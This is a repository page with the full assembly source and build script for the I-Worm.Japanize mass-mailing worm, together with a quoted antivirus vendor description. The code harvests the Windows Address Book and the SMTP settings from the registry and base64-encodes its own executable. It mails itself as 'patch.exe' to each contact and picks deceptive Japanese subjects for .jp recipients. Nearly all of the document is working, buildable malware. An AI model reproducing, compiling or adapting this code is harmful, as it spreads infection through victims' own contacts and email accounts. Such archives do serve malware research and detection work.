MalwareSourceCode/Win32/I-Worm.Japanize.asm
2020-10-09 22:25:52 -05:00

858 lines
16 KiB
NASM
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
;;; I-Worm.Japanize
;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
;;;
;;;
;;; This has some bugs.
;;;
;;; Here TrendMicro description:
;;; ******************************************************************
;;; http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=WORM_FBOUND.B&VSect=T
;;; Details:
;;;The details of the email this worm arrives with may be as follows:
;;;
;;;To: <recipient>
;;;Subject: <"Important" or random Japanese text(applicable on Japanese supported platforms)>
;;;Message Body: <blank>
;;;Attachment: patch.exe
;;;
;;;It uses its own SMTP engine and uses the following registry key to retrieve the default SMTP server of the infected system:
;;;HKEY_CURRENT_USER\Software\Microsoft\
;;;Internet Account Manager\Accounts\00000001
;;;
;;;It uses the following registry key to retrieve email addresses from the infected user's Windows Address Book (WAB):
;;;HKEY_CURRENT_USER\Software\Microsoft\WAB\
;;;WAB4Wab File Name = <20>g<pathname of WAB file><3E>h
;;;
;;;The email arrives with the attachment PATCH.EXE. If the email address of its target ;;;user ends with the extension .jp, the worm randomly selects a phrase, from a list of 17 possible Japanese phrases below, and uses one as the subject of the email:
;;;
;;;
;;;The English translation for the above Japanese text are as follows:
;;;Re: the issue that you mentioned
;;;Re: important
;;;Re: long time no see
;;;Re: top secret
;;;Re: Hello
;;;Re: important information
;;;Re: data
;;;the issue that you mentioned
;;;important
;;;long time no see
;;;top secret
;;;hello
;;;important information
;;;data
;;;frog
;;;shit
;;;shit
;;;
;;;Otherwise, it uses the subject <20>gImportant."
;;;
;;;This non-destructive worm does not drop files or create any registry entries. Its propagation depends on the execution of the file attachment in the email.
;;;
;;;The following text strings are found in the worm body:
;;;
;;;<3B>eXXXXXXXXXXXXXXXXXXXXXXX<58>f
;;;<3B>eXXXXX I-Worm.Japanize XXXXX<58>f
;;;<3B>eXXXXXXXXXXXXXXXXXXXXXXX<58>f
;;;
;;;
.586p
.model flat
locals
jumps
;;; some lazy shit
callW macro @@@x
extrn @@@x:proc
call @@@x
endm
ofs equ offset
dwo equ dword ptr
wo equ word ptr
by equ byte ptr
HKEY_CURRENT_USER EQU 80000001h
CRLF equ <13,10>
rdtsc equ <dw 310fh>
AF_INET equ 2
SOCK_STREAM equ 1
FILE_ATTRIBUTE_NORMAL EQU 00000080h
GENERIC_READ EQU 80000000h
GENERIC_WRITE EQU 40000000h
PAGE_READONLY EQU 00000002h
PAGE_READWRITE EQU 00000004h
FILE_MAP_READ EQU 00000004h
OPEN_EXISTING EQU 00000003h
GHND EQU 042h
FILE_SHARE_READ EQU 00000001h
FILE_SHARE_WRITE EQU 00000002h
;;; ----------------------------------------------------------------
.data
hReg dd ?; registry handle
str_SMInternetAccountManager db 'Software\Microsoft\Internet Account Manager',0
str_SMIAccounts db 'Software\Microsoft\Internet Account Manager\Accounts\'
AccountIdx db 9 dup(?); account index
bufsiz_accountidx dd 9; size
str_DMA db 'Default Mail Account',0
str_SMTPNAME db 'SMTP Server',0
str_SMTPEmailAddr db 'SMTP Email Address',0
str_SMWab4 db 'Software\Microsoft\WAB\WAB4\Wab File Name',0
SMTP_Server db 50 dup(?) ; default smtp server
bufsiz_SMTPSERVER dd 50
morons_Mailaddr db 256 dup(?) ; mail address of moron :)
bufsiz_morons_mailaddr dd 256
wab4_path db 260 dup(?); wab file path
bufsiz_wab4_path dd 260
buffer db 1000 dup(?)
hwab4file dd ? ; wab4 file handle
hwab4map dd ? ;
hwab4mapview dd ? ;
myfilename db 260 dup(?) ; handle of myself
hmyfile dd ?
fsize dd ? ; file size
hmemout0 dd ?
ptr_myself dd ?
hmemout dd ? ; globalalloc
ptr_base64buf dd ? ; globallock
target_mailaddr db 48h dup(?) ;
sockaddr_in label byte ;
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup(?)
len_sockaddr_in = $ - ofs sockaddr_in
sock dd ? ; socket descriptor
recv_buffer db 1024 dup(?) ; recv buffer
jflag dd 0 ; japanese or not
smtp_HELO db 'HELO localhost',CRLF
len_smtp_HELO = $ - ofs smtp_HELO
smtp_MAIL_FROM db 'MAIL FROM: '
len_smtp_MAIL_FROM = $ - ofs smtp_MAIL_FROM
;crlf
smtp_RCPT_TO db 'RCPT TO: '
len_smtp_RCPT_TO = $ - ofs smtp_RCPT_TO
;crlf
smtp_DATA db 'DATA',CRLF
len_smtp_DATA = $ - ofs smtp_DATA
smtp_BODY_FROM db 'FROM: '
len_smtp_BODY_FROM = $ - ofs smtp_BODY_FROM
smtp_BODY_TO db CRLF,'TO: '
len_smtp_BODY_TO = $ - ofs smtp_BODY_TO
smtp_BODY_SUBJECT db CRLF,'SUBJECT: Important',CRLF
len_smtp_BODY_SUBJECT = $ - ofs smtp_BODY_SUBJECT
smtp_DOT_CRLF db '.',CRLF
len_smtp_DOT_CRLF = $ - ofs smtp_DOT_CRLF
smtp_QUIT db 'QUIT',CRLF
len_smtp_QUIT = $ - ofs smtp_QUIT
smtp_crlf db CRLF
smtp_MIME_h db 'MIME-Version: 1.0',CRLF
db 'Content-Type: multipart/mixed; boundary="Boundary-a8dfidaoRadvfuck"',CRLF
db CRLF
db '--Boundary-a8dfidaoRadvfuck',CRLF
db 'Content-Type: text/plain; charset=iso-2022-jp',CRLF
db 'Content-Transfer-Encoding: 7bit',CRLF
db 'Content-Description: Mail message body',CRLF
db CRLF
db CRLF ; text
db CRLF
db '--Boundary-a8dfidaoRadvfuck',CRLF
db 'Content-Type: application/x-msdownload; name="patch.exe"',CRLF
db 'Content-Disposition: attachment; filename="patch.exe"',CRLF
db 'Content-Transfer-Encoding: BASE64',CRLF
db CRLF
len_smtp_MIME_h = $ - ofs smtp_MIME_h
;; base64 body
smtp_MIME_e db CRLF,'--Boundary-a8dfidaoRadvfuck--',CRLF,CRLF
len_smtp_MIME_e = $ - ofs smtp_MIME_e
r_seed dd 10987293h ; random seed
smtp_jsubject_1 db CRLF,'SUBJECT: =?ISO-2022-JP?B?'
len_smtp_jsubject_1 = $ - ofs smtp_jsubject_1
smtp_jsubject_2 db '?=',CRLF
len_smtp_jsubject_2 = $ - ofs smtp_jsubject_2
;;; japanese subjects table
japanese_subjects label byte
dd ofs js_01
dd ofs js_02
dd ofs js_03
dd ofs js_04
dd ofs js_05
dd ofs js_06
dd ofs js_07
dd ofs js_08
dd ofs js_09
dd ofs js_10
dd ofs js_11
dd ofs js_12
dd ofs js_13
dd ofs js_14
dd ofs js_15
dd ofs js_16
dd ofs js_17
num_of_jsub = ($ - ofs japanese_subjects)/4
js_01 db 'GyRCPUVNVxsoQg==',0 ; <20>d—v
js_02 db 'UmU6GyRCPUVNVxsoQg==',0; Re:<3A>d—v
js_03 db 'GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; <20>d—vȨmç¹
js_04 db 'UmU6GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; Re:<3A>d—vȨµç¹
js_05 db 'GyRCTmMkTjdvGyhC',0 ; —áÌŒ<C38C>
js_06 db 'UmU6GyRCTmMkTjdvGyhC',0; Re:—áÌŒ<C38C>
js_07 db 'GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; ¨vµÔèÅ·
js_08 db 'UmU6GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; Re:¨vµÔèÅ·
js_09 db 'GyRCJDMkcyRLJEEkTxsoQg==',0; ‚±‚ñ‚É‚¿‚Í
js_10 db 'UmU6GyRCJDMkcyRLJEEkTxsoQg==',0; Re:‚±‚ñ‚É‚¿‚Í
js_11 db 'GyRCNktIaxsoQg==',0 ; ܃ӎ
js_12 db 'UmU6GyRCNktIaxsoQg==',0; Re:܃ӎ
js_13 db 'GyRCO3FOQRsoQg==',0 ; Ž‘—¿
js_14 db 'UmU6GyRCO3FOQRsoQg==',0; Re:Ž‘—¿
js_15 db 'GyRCMz8bKEI=',0 ; ³¿º
js_16 db 'GyRCJSYlYxsoQlI=',0 ; ƒEƒ\ƒR
js_17 db 'GyRCJCYkcyQzGyhC',0 ; ‚¤‚ñ‚±
.code
start:
callW GetTickCount
mov dwo [r_seed],eax
jmp @@go
;; signature :)
db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0
db 'XXXXX I-Worm.Japanize XXXXX',0
db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0
@@go:
call get_some_info
push ofs buffer
push 0101h
callW WSAStartup
test eax,eax
jnz exit
call open_wab
test eax,eax
jnz clean_sock
call create_base64enc
call spread
free_mem:
push dwo [ptr_base64buf]
callW GlobalUnlock
push dwo [hmemout]
callW GlobalFree
close_wab4:
push dwo [hwab4file]
push dwo [hwab4map]
push dwo [hwab4mapview]
callW CloseHandle
callW CloseHandle
callW CloseHandle
clean_sock:
callW WSACleanup
exit:
push 0
callW ExitProcess
spread:
;; lifewire ;)
mov esi,dwo [hwab4mapview]
mov ecx,[esi+64h] ; num of addr
jecxz @@exit
add esi,[esi+60h] ; ptr to addr
@@spread_loop:
push ecx
mov eax,esi
cmp by [esi+1],0
jne @@nounicode
push esi
lea edi,target_mailaddr
push edi
push 48h
pop ecx
@@1:
lodsw
stosb
loop @@1
pop eax
pop esi
add esi,20h
@@nounicode:
call spread2
add esi,24h
pop ecx
loop @@spread_loop
@@exit:
ret
spread2:
push esi
mov esi,eax ; now esi=email addr
push 0
push 1
push 2
callW socket
mov dwo [sock],eax
mov wo [sin_family],AF_INET
mov ax,25
xchg al,ah
mov wo [sin_port],ax
push ofs SMTP_Server
callW gethostbyname
test eax,eax
jz @@exit
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
mov dwo [sin_addr],eax
push len_sockaddr_in
lea eax,sockaddr_in
push eax
push dwo [sock]
callW connect
test eax,eax
jnz @@exit
call sendmail
@@exit:
pop esi
ret
;;; ---
;;; reg stuff
get_some_info:
xor ebx,ebx
push ofs hReg
push 1
push ebx
push ofs str_SMInternetAccountManager
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error
push ofs bufsiz_accountidx
push ofs AccountIdx
push ebx
push ebx
push ofs str_DMA
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push dwo [hReg]
callW RegCloseKey
push ofs hReg
push 1
push ebx
push ofs str_SMIAccounts
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error
push ofs bufsiz_SMTPSERVER
push ofs SMTP_Server
push ebx
push ebx
push ofs str_SMTPNAME
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push ofs bufsiz_morons_mailaddr
push ofs morons_Mailaddr
push ebx
push ebx
push ofs str_SMTPEmailAddr
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push dwo [hReg]
callW RegCloseKey
push ofs hReg
push 1
push ebx
push ofs str_SMWab4
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error
push ofs bufsiz_wab4_path
push ofs wab4_path
push ebx
push ebx
push ebx
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push dwo [hReg]
callW RegCloseKey
xor eax,eax
ret
@@error:
xor eax,eax
dec eax
ret
open_wab:
xor ebx,ebx
push ebx
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push ebx
push FILE_SHARE_WRITE
push GENERIC_READ
push ofs wab4_path
callW CreateFileA
inc eax
jz @@error
dec eax
mov dwo [hwab4file],eax
push ebx
push ebx
push ebx
push PAGE_READONLY
push ebx
push eax
callW CreateFileMappingA
mov dwo [hwab4map],eax
push ebx
push ebx
push ebx
push FILE_MAP_READ
push eax
callW MapViewOfFile
mov dwo [hwab4mapview],eax
xor eax,eax
ret
@@error:
xor eax,eax
dec eax
ret
create_base64enc:
push 260
push ofs myfilename
push 0
callW GetModuleFileNameA
xor ebx,ebx
push ebx
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push ebx
push FILE_SHARE_READ
push GENERIC_READ
push ofs myfilename
callW CreateFileA
inc eax
jz @@error
dec eax
mov dwo [hmyfile],eax
push 0
push dwo [hmyfile]
callW GetFileSize
mov dwo [fsize],eax
add eax,100h
push eax
push GHND
callW GlobalAlloc
mov dwo [hmemout0],eax
push eax
callW GlobalLock
mov dwo [ptr_myself],eax
push 0
push ofs recv_buffer
push dwo [fsize]
push eax
push dwo [hmyfile]
callW ReadFile
test eax,eax
jz @@eexit
push 0
push dwo [hmyfile]
callW GetFileSize
push eax ; save size
shl eax,1 ; eax*2
push eax
push GHND
callW GlobalAlloc
mov dwo [hmemout],eax
push eax
callW GlobalLock
mov dwo [ptr_base64buf],eax
; pop ebx ; restore size
; push ebx ; size
push eax
push dwo [ptr_myself]
call base64encode
push dwo [hmyfile]
callW CloseHandle
push dwo [ptr_myself]
callW GlobalUnlock
push dwo [hmemout0]
callW GlobalFree
xor eax,eax
ret
@@eexit:
push dwo [hmyfile]
callW CloseHandle
push dwo [ptr_myself]
callW GlobalUnlock
push dwo [hmemout0]
callW GlobalFree
@@error:
xor eax,eax
dec eax
ret
base64encode proc pascal
arg @@src
arg @@dest
arg @@srclen
mov esi,dwo [@@src]
mov edi,dwo [@@dest]
@@b64loop:
xor eax,eax
cmp dwo [@@srclen],1
jne @@srclen2
lodsb
push 2
pop ecx
mov edx,03D3Dh ; ==
dec dwo [@@srclen]
jmp @@b64next
@@srclen2:
cmp dwo [@@srclen],2
jne @@srclen3
lodsw
push 3
pop ecx
push 03dh
pop edx
sub dwo [@@srclen],2
jmp @@b64next
@@srclen3:
lodsd
push 4
pop ecx
xor edx,edx
dec esi
sub dwo [@@srclen],3
@@b64next:
bswap eax
@@b64n_loop:
mov ebx,eax
and eax,0FC000000h
rol eax,6
mov al,[@@b64table + eax]
stosb
mov eax,ebx
shl eax,6
dec ecx
jnz @@b64n_loop
cmp dwo [@@srclen],0
ja @@b64loop
mov eax,edx
stosd
ret
@@b64table db "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
endp
g_send:
;; in
;; ecx = size
;; esi = ptr to data
;; out
;; eax = ret value of send()
push 0
push ecx
push esi
push dwo [sock]
callW send
ret
g_recv:
;; out
;; error -> eax=-1 success -> eax = 0
@@again:
push 0
push 1024
push ofs recv_buffer
push dwo [sock]
callW recv
inc eax
jz @@recv_error
cmp eax,1024
jz @@again
xor eax,eax
ret
@@recv_error:
xor eax,eax
dec eax
ret
sendmail:
;; yea. lame routine ;)
push esi ; mail addr
mov dwo [jflag],0 ; flag for .jp
;;
call g_recv
;;
lea esi,smtp_HELO
mov ecx,len_smtp_HELO
call g_send
call g_recv
;;
lea esi,smtp_MAIL_FROM
mov ecx,len_smtp_MAIL_FROM
call g_send
push ofs morons_Mailaddr
callW lstrlen
mov ecx,eax
lea esi,morons_Mailaddr
call g_send
mov ecx,2
lea esi,smtp_crlf
call g_send
call g_recv
;;
mov ecx,len_smtp_RCPT_TO
lea esi,smtp_RCPT_TO
call g_send
pop esi
push esi
push esi
callW lstrlen
push eax ; save
mov ecx,eax
call g_send
mov ecx,2
lea esi,smtp_crlf
call g_send
call g_recv
;; .jp?
pop eax ; len of mail address
pop esi
push esi ; mail address
add esi,eax
sub esi,3
cmp dwo [esi],00706a2eh ; .jp?
jne @@1
inc dwo [jflag]
@@1:
;;
lea esi,smtp_DATA
mov ecx,len_smtp_DATA
call g_send
call g_recv
;;
lea esi,smtp_BODY_FROM
mov ecx,len_smtp_BODY_FROM
call g_send
push ofs morons_Mailaddr
callW lstrlen
mov ecx,eax
lea esi,morons_Mailaddr
call g_send
lea esi,smtp_BODY_TO
mov ecx,len_smtp_BODY_TO
call g_send
pop esi
push esi
push esi
callW lstrlen
mov ecx,eax
call g_send
cmp dwo [jflag],0
jnz @@jsubject
mov ecx,len_smtp_BODY_SUBJECT
lea esi,smtp_BODY_SUBJECT
call g_send
jmp @@body
@@jsubject:
;; gen subject
mov ecx,len_smtp_jsubject_1
lea esi,smtp_jsubject_1
call g_send
mov esi,(num_of_jsub-1)
call rng
lea esi,japanese_subjects
mov esi,dwo [esi+eax*4]
push esi
callW lstrlen
mov ecx,eax
call g_send
mov ecx,len_smtp_jsubject_2
lea esi,smtp_jsubject_2
call g_send
@@body:
lea esi,smtp_MIME_h
mov ecx,len_smtp_MIME_h
call g_send
mov esi,dwo [ptr_base64buf]
push esi
push esi
callW lstrlen
pop esi
mov ecx,eax
call g_send
lea esi,smtp_MIME_e
mov ecx,len_smtp_MIME_e
call g_send
mov ecx,len_smtp_DOT_CRLF
lea esi,smtp_DOT_CRLF
call g_send
call g_recv
;;
mov ecx,len_smtp_QUIT
lea esi,smtp_QUIT
call g_send
call g_recv
pop esi
ret
rng:
;; in
;; esi = range
;; out
;; eax = random number
rdtsc
xor eax,edx
imul eax,dwo [r_seed]
dec eax
mov dwo [r_seed],eax
xor edx,edx
div esi
mov eax,edx
ret
end start
*************************************************************************
@ECHO OFF
TASM32 /ml /m /z japanize.asm,japanize.obj
TLINK32 -x -aa -Tpe japanize.obj,,,%import32.lib
DEL *.OBJ